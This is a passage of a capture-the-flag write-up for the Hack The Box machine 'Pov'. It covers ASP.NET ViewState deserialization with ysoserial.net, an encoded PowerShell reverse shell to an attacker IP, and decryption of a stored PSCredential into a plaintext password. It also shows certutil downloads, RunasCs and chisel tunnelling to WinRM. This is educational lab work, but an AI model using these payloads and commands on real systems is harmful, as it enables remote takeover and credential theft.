6 2.043164534 10.10.14.87 → 10.129.230.183 ICMP 60 Echo (ping) reply id=0x0001, seq=3/768, ttl=64 (request in 5)
7 3.059031969 10.129.230.183 → 10.10.14.87 ICMP 60 Echo (ping) request id=0x0001, seq=4/1024, ttl=127
8 3.059070069 10.10.14.87 → 10.129.230.183 ICMP 60 Echo (ping) reply id=0x0001, seq=4/1024, ttl=64 (request in 7)
Our command ran. Now swap it for a reverse shell: the -e argument below is a base64-encoded UTF-16LE PowerShell TCP reverse shell to 10.10.14.87:4444.
PS D:\tools\ysoserial_net> ./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAA3ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
4%2BR3bArUXKU%2FKGCVn5L%2F6Nb%2Bixtfvby5B3L0Mbvn2fu2GQxhhfKAcJCryK6%2BcDLFBwL1QfIb3wcdxXxz1SD608pSj33CAAtIKAvmtnMczq02WgGF5%2BsFQb6hNYXXQaR5Zsr5%2B6cBe5hdntzuJW%2BgodPy5WPdjD0xQ23xJ2mWH7qyGumE7UrTLt2j9KOODZ6HF%2F0dy%2FAAwQmO1rtIn7UjAwPNLD%2F38Hp7ooHgyYJ8%2Bd7TMW%2BvDepVrix3bYbLHpgvM5j50HFoeU%2BPFtUqyHb6sDT4cE%2Fs8R3rV75yG0t8GFnhU3Lo23H%2Ft1QVSShR3O9488yj6AKLFZxrlgDNK9HY5YbY7wfeP2I2KRpqaJXOyQkTlaIyH8b8H7AnRlyJOYnR5JvU5t3WJ0mwOKqeOpnH3xyIlWM%2Bin4Rtv1QLU9ctDVY5Tzf7XiC64OVDIitoTMtErwvcYey1ibJJAIcMv8Tzaw2SRsqDz05a1MZVVuoSdd0Q0k%2Fc3QWHkYwSz%2BjvslDhf4ptut%2Bp77dDb2p4kp1fWwRk%2BugImYclLN7BiNctqe6t7Qn5eKpWjxlA2myPALZOg72belofBaVTiemnspMdJeQUU5TDBrZOxL71PXM3seihUuxqW%2FSQ6HbN%2FFgjwcZ%2Firy4FZJXQ4wsM4J4zoZXPoZuDj%2FFvLyZGh4VRRgGIC4tFDHy9CjMQVVIxBiBCXQrkAdX5K0YBDkzm7GmRJRGG726zPpiiOoEHBFIyKt4%2BoxyouUtFG036HfAxGnW%2Fqr%2FqwPZrPdbNshX4fwRFRE%2BltFnny7eMGNt0WUQxS3UfOQC5n3iD%2FWPU23G%2BG194KYPVvuujuyW4iBaZ%2BtC%2BbXtHHHMyokIRLRZVthBaC69Bhe6d6XY%2FO7pTTuB5J%2FbB91s7GSstqGKaXEHFjl6YPEsj7tDJUFGvL%2FGdvRObUHXoht%2FXTZdg1voGSzcbQzm61lBNi0h91CuhuxJfPZufuTPDkDVAHysSQXfJnKSy6rmnEIqvAKf6nkoWjiWWeaB%2B0bds53zc1YkE8cpFqaovwp3exHl%2ByNgrx%2BVDQQdhPhVGRR8Hbp6Z%2BIpXOVb6W0kzfqBkV%2FYxNfTTy0g0A%2Bw%2FAax6ljToKh9IJV2M0CBWhpE8Pf7kYW8Fv99cmv151ccUjgOAnZ%2FAQkf7FHwn0Yuc%2FxkKXZhV6GA46rnZLonsst%2FgpvBvMJhQxEc%2B5elzzjFQfbdwjUu25fpjeWb7hsNlccb%2BUGuhF%2BwyqX2q2hUrbVa7KcnqFld%2B10nVXBJyPm4T4%2FSd8R58P36ZDLCfcpz9AiUJjRupuM7O6kFhTt5o1RzScYDcMx0vF8lYfjOsfrEoVRbRhOIVmSKfp1G%2ByUPRIqcWjtOtEY98p2SPgHCUU%2BSBpll%2B97RmOjTC5hI3Qls4o1sdVNRaEMmaCN830MtkHapmNHQouhJKllfWRgVg8JIrPwYmodXb7pLrOZ7NklDRP91KlRP3VFmHBuYnqUYPLuUTnp3ELhQrUdIgcHLFuR%2B9Vp%2FmQ8rC2hH%2BTJrSgjd9UwlwUU6Bqsq%2FZgwnBJtV319W2E37VI7hUSS%2FZNj3ljmRw%2FLNwv2rA2uZtBf3qO8qjdRxnZdSWXU0yOnoxD7T83iOtMAP5j%2BWqPkW%2FsCc4CWBBpMrJx0%2FqKKdIHffsBYz80PKgdNx%2BIbqGIAocHj6T7iJ7sjgovHvbgK%2BwpHuoXC3WJ5YxeVTlhg61YaAulNcLV%2BWARQixINcNVuKVbYRU5Bty%2Be9%2BB812gWEGJFiRXNAInYA89qf2jEfYHE6WfCiYHq9kTj1vgCkRimwqE6qEj1zMD1L5ge60o5asPkPJOzNVq2QBfNzPtEO7dKpChwYfX9qkpgf
g%2B4V2zaqOamPZmYMJZqF%2F2xTWT2%2FshOX4w6wmA0ZC7HjSsLqybEQ0JaNp0uzpH0cXGHXLT%2FWZgDKfE5kOArkj1%2BuBs3VE6HIbu%2FjpYih2xIbXsvqpXtzz2qwwaBc0Y%2BZDRzUO43pv9H%2BW%2BYnDnBAR1HNGWKxKkUEUTNcvYsL9JL6ujzSSjRyiG%2FqIM06nkiyChgJUQZ5k%2FRLJl68Gqq4FosO53SBnD3KR7t4T1oWG944o51skF56xba6OtzbLOuukmTTv3spzRe4ZYU0mYcYmyRmPoSqw22HN7p8EI85eUrE2EzmYcDB8RlLLR5mHSDRB2Tj8CU68o6h5LGy3DZbUyzHvAASIcJ1RC1f%2FNRbUzUs8hcMiLC31t%2BUJXUjZLVPXBajV9UPb1sIQmPxgPuucq66Cu7Cb0xtjoJl5J9dtzwOKjRDH1JQiv%2BItJA36iV%2BIzA5kLcOchGI0CiRN0eZtKNOtajdtCMgPj3t0ir61dbodGGQXSQEDNopPmMwiSYG7ayj0qCpWR2D5SX%2BhsxCzFYr9HA6PTSqSC4t96mEMfO8t%2Ff7fuVXHr7SxiBd6za4B8ZOm1XoTTxQRSWZHV9bUyWC%2FBe8zlEV0fc13goSxwnPyCMrxYYoqkR4TqeKYsFCjPxj1P%2BSDFLL%2B6Re7SIhb5uwv0%2B3SemqDIScjptLrgy7N7EHhzGyQc9SqIBTcS8DWaC1o0rhnKPl%2BtWzEQtpA896trgfSs3ZXIbXW7bjwwNRrfrPcEpnpVmOAAUP3tICqtr4suHRR0metylPQK1Hv1eeteU9DG4iJslkSjaJdw8JNy9bDZFtzuICWnvSQMsZDHn9L9WCiLEy%2B97co%2FTDPsm4it%2BB3K5AYqnKuk4y7V%2FDjNt%2FFVTZfzFngWxUiUX2umE%2FkIZ9uEMtVnM%2F2hz1AT0aA8keGAN8meg9dowitqC3DC4iSkgtmG8hC7XA4EsTXATAdf4%2BlRGGe2UppGDJ8a%2BNBXgR%2FM%2Fmm2QGM6XgCbTY0El7S6ls%2BHbBN%2BCX3T8m7aPg%2F902qua9R5StcXhsNcamz1Gkgp4KATnZ2cF91xDR4g8V6u6AdQZ1pgYMhCATlzzr30Tm6fNdU%2FiyAg7lPw1b3V3Eac%2Bg%2F66JtyEDkxt6OKj783QtNB8Xjypd1YEQTek6nXqb15yflI2cnRr3KspRrrdg4qzMbJDzaygzxyufevNQl6cuOn5SwLt%2BYHYg%3D%3D
Then send the payload to trigger the deserialization. The genuine __EVENTVALIDATION from a real page load is kept; ViewState is loaded and deserialized earlier in the page lifecycle than event validation, so the gadget fires regardless.
POST /portfolio/default.aspx HTTP/1.1
Host: dev.pov.htb
Content-Length: 3571
Cache-Control: max-age=0
Origin: http://dev.pov.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://dev.pov.htb/portfolio/default.aspx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=4%2BR3bArUXKU%2FKGCVn5L%2F6Nb%2Bixtfvby5B3L0Mbvn2fu2GQxhhfKAcJCryK6%2BcDLFBwL1QfIb3wcdxXxz1SD608pSj33CAAtIKAvmtnMczq02WgGF5%2BsFQb6hNYXXQaR5Zsr5%2B6cBe5hdntzuJW%2BgodPy5WPdjD0xQ23xJ2mWH7qyGumE7UrTLt2j9KOODZ6HF%2F0dy%2FAAwQmO1rtIn7UjAwPNLD%2F38Hp7ooHgyYJ8%2Bd7TMW%2BvDepVrix3bYbLHpgvM5j50HFoeU%2BPFtUqyHb6sDT4cE%2Fs8R3rV75yG0t8GFnhU3Lo23H%2Ft1QVSShR3O9488yj6AKLFZxrlgDNK9HY5YbY7wfeP2I2KRpqaJXOyQkTlaIyH8b8H7AnRlyJOYnR5JvU5t3WJ0mwOKqeOpnH3xyIlWM%2Bin4Rtv1QLU9ctDVY5Tzf7XiC64OVDIitoTMtErwvcYey1ibJJAIcMv8Tzaw2SRsqDz05a1MZVVuoSdd0Q0k%2Fc3QWHkYwSz%2BjvslDhf4ptut%2Bp77dDb2p4kp1fWwRk%2BugImYclLN7BiNctqe6t7Qn5eKpWjxlA2myPALZOg72belofBaVTiemnspMdJeQUU5TDBrZOxL71PXM3seihUuxqW%2FSQ6HbN%2FFgjwcZ%2Firy4FZJXQ4wsM4J4zoZXPoZuDj%2FFvLyZGh4VRRgGIC4tFDHy9CjMQVVIxBiBCXQrkAdX5K0YBDkzm7GmRJRGG726zPpiiOoEHBFIyKt4%2BoxyouUtFG036HfAxGnW%2Fqr%2FqwPZrPdbNshX4fwRFRE%2BltFnny7eMGNt0WUQxS3UfOQC5n3iD%2FWPU23G%2BG194KYPVvuujuyW4iBaZ%2BtC%2BbXtHHHMyokIRLRZVthBaC69Bhe6d6XY%2FO7pTTuB5J%2FbB91s7GSstqGKaXEHFjl6YPEsj7tDJUFGvL%2FGdvRObUHXoht%2FXTZdg1voGSzcbQzm61lBNi0h91CuhuxJfPZufuTPDkDVAHysSQXfJnKSy6rmnEIqvAKf6nkoWjiWWeaB%2B0bds53zc1YkE8cpFqaovwp3exHl%2ByNgrx%2BVDQQdhPhVGRR8Hbp6Z%2BIpXOVb6W0kzfqBkV%2FYxNfTTy0g0A%2Bw%2FAax6ljToKh9IJV2M0CBWhpE8Pf7kYW8Fv99cmv151ccUjgOAnZ%2FAQkf7FHwn0Yuc%2FxkKXZhV6GA46rnZLonsst%2FgpvBvMJhQxEc%2B5elzzjFQfbdwjUu25fpjeWb7hsNlccb%2BUGuhF%2BwyqX2q2hUrbVa7KcnqFld%2B10nVXBJyPm4T4%2FSd8R58P36ZDLCfcpz9AiUJjRupuM7O6kFhTt5o1RzScYDcMx0vF8lYfjOsfrEoVRbRhOIVmSKfp1G%2ByUPRIqcWjtOtEY98p2SPgHCUU%2BSBpll%2B97RmOjTC5hI3Qls4o1sdVNRaEMmaCN830MtkHapmNHQouhJKllfWRgVg8JIrPwYmodXb7pLrOZ7NklDRP91KlRP3VFmHBuYnqUYPLuUTnp3ELhQrUdIgcHLFuR%2B9Vp%2FmQ8rC2hH%2BTJrSgjd9UwlwUU6Bqsq%2FZgwnBJtV319W2E37VI7hUSS%2FZNj3ljmRw%2FLNwv2rA2uZtBf3qO8qjdRxnZdSWXU0yOnoxD7T83iOtMAP5j%2BWqPkW%2FsCc4CWBBpMrJx0%2FqKKdIHffsBYz80PKgdNx%2BIbqGIAocHj6T7iJ7sjgovHvbgK%2BwpHuoXC3WJ5YxeVTlhg61YaAulNcLV%2BWARQixINcNVuKVbYRU5Bty%2Be9%2BB812gWEGJFiRXNAInYA89qf2jEfYHE6WfCiYHq9kTj1vgCkRimwqE6q
Ej1zMD1L5ge60o5asPkPJOzNVq2QBfNzPtEO7dKpChwYfX9qkpgfg%2B4V2zaqOamPZmYMJZqF%2F2xTWT2%2FshOX4w6wmA0ZC7HjSsLqybEQ0JaNp0uzpH0cXGHXLT%2FWZgDKfE5kOArkj1%2BuBs3VE6HIbu%2FjpYih2xIbXsvqpXtzz2qwwaBc0Y%2BZDRzUO43pv9H%2BW%2BYnDnBAR1HNGWKxKkUEUTNcvYsL9JL6ujzSSjRyiG%2FqIM06nkiyChgJUQZ5k%2FRLJl68Gqq4FosO53SBnD3KR7t4T1oWG944o51skF56xba6OtzbLOuukmTTv3spzRe4ZYU0mYcYmyRmPoSqw22HN7p8EI85eUrE2EzmYcDB8RlLLR5mHSDRB2Tj8CU68o6h5LGy3DZbUyzHvAASIcJ1RC1f%2FNRbUzUs8hcMiLC31t%2BUJXUjZLVPXBajV9UPb1sIQmPxgPuucq66Cu7Cb0xtjoJl5J9dtzwOKjRDH1JQiv%2BItJA36iV%2BIzA5kLcOchGI0CiRN0eZtKNOtajdtCMgPj3t0ir61dbodGGQXSQEDNopPmMwiSYG7ayj0qCpWR2D5SX%2BhsxCzFYr9HA6PTSqSC4t96mEMfO8t%2Ff7fuVXHr7SxiBd6za4B8ZOm1XoTTxQRSWZHV9bUyWC%2FBe8zlEV0fc13goSxwnPyCMrxYYoqkR4TqeKYsFCjPxj1P%2BSDFLL%2B6Re7SIhb5uwv0%2B3SemqDIScjptLrgy7N7EHhzGyQc9SqIBTcS8DWaC1o0rhnKPl%2BtWzEQtpA896trgfSs3ZXIbXW7bjwwNRrfrPcEpnpVmOAAUP3tICqtr4suHRR0metylPQK1Hv1eeteU9DG4iJslkSjaJdw8JNy9bDZFtzuICWnvSQMsZDHn9L9WCiLEy%2B97co%2FTDPsm4it%2BB3K5AYqnKuk4y7V%2FDjNt%2FFVTZfzFngWxUiUX2umE%2FkIZ9uEMtVnM%2F2hz1AT0aA8keGAN8meg9dowitqC3DC4iSkgtmG8hC7XA4EsTXATAdf4%2BlRGGe2UppGDJ8a%2BNBXgR%2FM%2Fmm2QGM6XgCbTY0El7S6ls%2BHbBN%2BCX3T8m7aPg%2F902qua9R5StcXhsNcamz1Gkgp4KATnZ2cF91xDR4g8V6u6AdQZ1pgYMhCATlzzr30Tm6fNdU%2FiyAg7lPw1b3V3Eac%2Bg%2F66JtyEDkxt6OKj783QtNB8Xjypd1YEQTek6nXqb15yflI2cnRr3KspRrrdg4qzMbJDzaygzxyufevNQl6cuOn5SwLt%2BYHYg%3D%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=qgc030AAmAaTuLUVGlqD6MUknbiYTBleQNrCV8P2mbBUJewX2YmILbyTy8XiBdrFyNgD50fh4KpeC0CllQStSAzoJMQGoCz3KwgGajEuSXDdxe92qko%2FlXfKC1LmsDcvMthbfQ%3D%3D&file=\\10.10.14.87\shares
The listener receives the shell:
┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.87] from (UNKNOWN) [10.129.230.183] 49674
PS C:\windows\system32\inetsrv> whoami
pov\sfitz
PS C:\windows\system32\inetsrv>
1.5. connection.xml
Listing C:\Users shows that sfitz has no user.txt:
PS C:\users> tree . /f /a
Folder PATH listing
Volume serial number is 0899-6CAF
C:\USERS
+---.NET v4.5
+---.NET v4.5 Classic
+---Administrator
+---alaading
+---Public
| +---Documents
| +---Downloads
| +---Music
| +---Pictures
| \---Videos
\---sfitz
+---3D Objects
+---Contacts
+---Desktop
+---Documents
>>>> | connection.xml
|
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos
connection.xml stands out as suspicious:
PS C:\users\sfitz\documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">[...]</SS>
</Props>
</Obj>
</Objs>
This is a serialized PSCredential for the user alaading, written with Export-Clixml. The <SS> element is a SecureString protected with DPAPI under the master key of the user who exported it, so there are two ways to get the password back: decrypt the blob offline with that user's DPAPI master key, or import the file in the same user context on the same machine and let DPAPI unprotect it for us.
For the import approach see: Windows Local Privilege Escalation - HackTricks
Check whether our current context matches the file's owner (the owner is not proof of who ran Export-Clixml, but it is the obvious candidate):
PS C:\users\sfitz\documents> get-acl connection.xml
Directory: C:\users\sfitz\documents
Path Owner Access
---- ----- ------
>>>> connection.xml POV\sfitz NT AUTHORITY\SYSTEM Allow FullControl...
PS C:\users\sfitz\documents> whoami
>>>> pov\sfitz
The owner is sfitz, the user we are running as, so we can import the file directly:
PS C:\users\sfitz\documents> $credential = Import-Clixml -Path connection.xml
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().password
f8gQ8fynP44ek1m3
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().username
alaading
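The same decryption done by hand, as an added example that is not part of the original writeup. Instead of Import-Clixml it parses the CliXML itself and feeds the <SS> hex blob to ConvertTo-SecureString, which makes the DPAPI binding explicit: the call succeeds only for the same user on the same machine. The demo credential and file path are constructed for the example; nothing here is the real connection.xml.

```powershell
# Added example: read an Export-Clixml'd PSCredential without Import-Clixml.
function Read-ClixmlCredential {
    param([Parameter(Mandatory)][string]$Path)

    $xml = [xml](Get-Content -Path $Path -Raw)
    $ns  = New-Object System.Xml.XmlNamespaceManager($xml.NameTable)
    $ns.AddNamespace('ps', 'http://schemas.microsoft.com/powershell/2004/04')

    $user = $xml.SelectSingleNode("//ps:S[@N='UserName']", $ns).InnerText
    $blob = $xml.SelectSingleNode("//ps:SS[@N='Password']", $ns).InnerText
    if (-not $user -or -not $blob) { throw "No PSCredential UserName/Password found in $Path" }

    try {
        # <SS> is a hex-encoded DPAPI blob (CryptProtectData with the *exporting user's* master key).
        # Only that SID on this machine, or someone holding that user's master key, can unprotect it.
        $secure = ConvertTo-SecureString -String $blob
    } catch {
        # Typical failure from another user/machine: "Key not valid for use in specified state."
        throw "DPAPI unprotect failed for ${Path}: $($_.Exception.Message) (wrong user or machine context)"
    }
    return [pscredential]::new($user, $secure).GetNetworkCredential()
}

# Demo in the current user context: write a credential the way the box did, then read it back.
$demoPath = Join-Path $env:TEMP 'demo-connection.xml'                               # constructed
$demoCred = [pscredential]::new('alaading', (ConvertTo-SecureString 'NotTheRealPassword' -AsPlainText -Force))
$demoCred | Export-Clixml -Path $demoPath

$nc = Read-ClixmlCredential -Path $demoPath
'{0} : {1}' -f $nc.UserName, $nc.Password
Remove-Item $demoPath

# Contrast: a SecureString exported with an explicit AES key is portable and decrypts anywhere
# the key is known, which is why key-based exports are the ones worth hunting for on other hosts.
$key = [byte[]](1..32)                                                               # constructed key
$portable = ConvertFrom-SecureString -SecureString $demoCred.Password -Key $key
[pscredential]::new('alaading', (ConvertTo-SecureString -String $portable -Key $key)).GetNetworkCredential().Password
```

Run it as sfitz and the real connection.xml opens; run it from the RunasCs shell as alaading and the ConvertTo-SecureString call throws, which is the check the Get-Acl step above was standing in for.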
We now have alaading's credentials; RunasCs is used to get a process running as that account.
1.6. RunasCs
First transfer the binary, served from a Python web server on Kali:
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.230.183 - - [11/Dec/2025 11:04:15] "GET /RunasCs.exe HTTP/1.1" 200 -
PS C:\users\public> certutil -f -split -urlcache http://10.10.14.87/RunasCs.exe
**** Online ****
0000 ...
ca00
CertUtil: -URLCache command FAILED: 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
CertUtil: The operation timed out
Despite the reported timeout the file did land:
PS C:\users\public> ls
Directory: C:\users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/26/2023 2:27 PM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d-r--- 9/15/2018 12:19 AM Videos
-a---- 12/11/2025 8:04 AM 51712 RunasCs.exe
Then use it to spawn a reverse shell running as alaading:
PS C:\users\public> .\runascs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.87:5555
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-85b98$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 880 created in background.
PS C:\users\public>
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.87] from (UNKNOWN) [10.129.230.183] 49683
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
pov\alaading
C:\Users>tree . /f /a
tree . /f /a
Folder PATH listing
Volume serial number is 0899-6CAF
C:\USERS
+---.NET v4.5
+---.NET v4.5 Classic
+---Administrator
+---alaading
| +---3D Objects
| +---Contacts
| +---Desktop
>>>> | | user.txt
| |
| +---Documents
| +---Downloads
| +---Favorites
| | | Bing.url
| | |
| | \---Links
| +---Links
| | Desktop.lnk
| | Downloads.lnk
| |
| +---Music
| +---Pictures
| +---Saved Games
| +---Searches
| \---Videos
+---Public
| | RunasCs.exe
| |
| +---Documents
| +---Downloads
| +---Music
| +---Pictures
| \---Videos
\---sfitz
user.txt is now readable:
C:\Users\alaading\Desktop>type user.txt
type user.txt
2cceb2fd24dbae9**********************
2. System
2.1. privilege
C:\Users\alaading\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
>>>> SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
The token holds SeDebugPrivilege, which is enough to escalate to SYSTEM (see Abusing Tokens - HackTricks), but it is shown as Disabled in this RunasCs-spawned process.
Disabled only means "present but not enabled" in the token: the process itself could turn it on with AdjustTokenPrivileges. A privilege that is absent from the token cannot be added this way; that would need a different logon.
Here we take the simpler route and log in via evil-winrm, whose session token comes with the privileges enabled.
2.2. evil-winrm
netstat shows 5985 listening on all interfaces and the WinRM service running, yet the nmap scan found only port 80 reachable, so the host firewall is blocking it from outside. We forward the port over our existing shell instead.
C:\Users\alaading\Desktop>netstat -ano |findstr 5985
netstat -ano |findstr 5985
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
C:\Users\alaading\Desktop>sc query winrm
sc query winrm
SERVICE_NAME: winrm
TYPE : 30 WIN32
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
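Before tunnelling it is worth confirming the diagnosis. The listener binds 0.0.0.0, so the remaining suspect is the host firewall scope. The check below is an added example, not part of the original writeup; the rule names and remote-address scopes it prints are whatever the host actually has, and none were captured from the box. It lists every enabled inbound rule covering a port, with its profile and RemoteAddress (a scope of LocalSubnet on the active profile is the usual reason WinRM is reachable from the LAN but not from an attacker on another subnet).

```powershell
# Added example: which enabled inbound firewall rules cover a given TCP port, and from where?
function Get-InboundRulesForPort {
    param([Parameter(Mandatory)][int]$Port, [string]$Protocol = 'TCP')

    foreach ($rule in Get-NetFirewallRule -Direction Inbound -Enabled True) {
        $pf = $rule | Get-NetFirewallPortFilter
        if ($pf.Protocol -ne $Protocol) { continue }
        # LocalPort may be 'Any', a single port, a range 'a-b', or an array of those.
        $match = @($pf.LocalPort) | Where-Object {
            $_ -eq 'Any' -or $_ -eq "$Port" -or
            ($_ -match '^(\d+)-(\d+)$' -and [int]$Matches[1] -le $Port -and $Port -le [int]$Matches[2])
        }
        if (-not $match) { continue }
        $af = $rule | Get-NetFirewallAddressFilter
        [pscustomobject]@{
            Name          = $rule.DisplayName
            Action        = $rule.Action
            Profile       = $rule.Profile            # only rules for the active profile apply
            LocalPort     = (@($pf.LocalPort) -join ',')
            RemoteAddress = (@($af.RemoteAddress) -join ',')   # 'LocalSubnet' explains an external block
        }
    }
}

# The active network profile decides which rule set is in force.
Get-NetConnectionProfile | Select-Object Name, InterfaceAlias, NetworkCategory
Get-InboundRulesForPort -Port 5985 | Format-Table -AutoSize
```

If no Allow rule for 5985 matches the active profile, or its RemoteAddress is LocalSubnet, the port forward below is the right fix from the attacker's side; changing the rule would need administrative rights we do not yet have.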
Use chisel to expose the target's 5985 on Kali:
C:\Users\alaading\Desktop>certutil -f -split -urlcache http://10.10.14.87/chisel.exe
certutil -f -split -urlcache http://10.10.14.87/chisel.exe
**** Online ****
000000 ...
a1ee00
CertUtil: -URLCache command completed successfully.
C:\Users\alaading\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0899-6CAF
Directory of C:\Users\alaading\Desktop
12/11/2025 08:18 AM <DIR> .
12/11/2025 08:18 AM <DIR> ..
12/11/2025 08:18 AM 10,612,224 chisel.exe
12/11/2025 05:24 AM 34 user.txt
2 File(s) 10,612,258 bytes
2 Dir(s) 7,314,804,736 bytes free
# start the chisel server on Kali
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# chisel server --reverse -p 8000
2025/12/11 11:23:52 server: Reverse tunnelling enabled
2025/12/11 11:23:52 server: Fingerprint Ba8AdxcEOyFROFNdLGmzd9gJAShvbksIdGkhIKhAe2M=
2025/12/11 11:23:52 server: Listening on http://0.0.0.0:8000
# connect the client and set up the reverse port forward
C:\Users\alaading\Desktop>.\chisel.exe client 10.10.14.87:8000 R:5985:127.0.0.1:5985
.\chisel.exe client 10.10.14.87:8000 R:5985:127.0.0.1:5985
2025/12/11 08:24:43 client: Connecting to ws://10.10.14.87:8000
2025/12/11 08:24:43 client: Connected (Latency 70.2738ms)
# the server shows the client connected and the reverse listener up
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# chisel server --reverse -p 8000
2025/12/11 11:23:52 server: Reverse tunnelling enabled
2025/12/11 11:23:52 server: Fingerprint Ba8AdxcEOyFROFNdLGmzd9gJAShvbksIdGkhIKhAe2M=
2025/12/11 11:23:52 server: Listening on http://0.0.0.0:8000
2025/12/11 11:24:42 server: session#1: Client version (1.11.3) differs from server version (1.10.1-0kali1)
2025/12/11 11:24:42 server: session#1: tun: proxy#R:5985=>5985: Listening
Connecting to 127.0.0.1:5985 on Kali now reaches the target's WinRM; log in with alaading's credentials:
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# evil-winrm -i 127.0.0.1 -u alaading -p f8gQ8fynP44ek1m3
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alaading\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
